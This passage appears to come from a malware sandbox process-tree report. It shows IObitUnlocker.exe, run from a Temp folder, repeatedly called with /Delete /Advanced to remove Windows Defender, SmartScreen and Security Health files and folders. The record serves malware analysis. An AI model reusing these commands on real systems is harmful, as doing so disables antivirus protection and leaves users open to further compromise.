Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:9132
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:8488
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:8980
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8792
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:9028
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:3260
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:8432
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:9000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8836
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
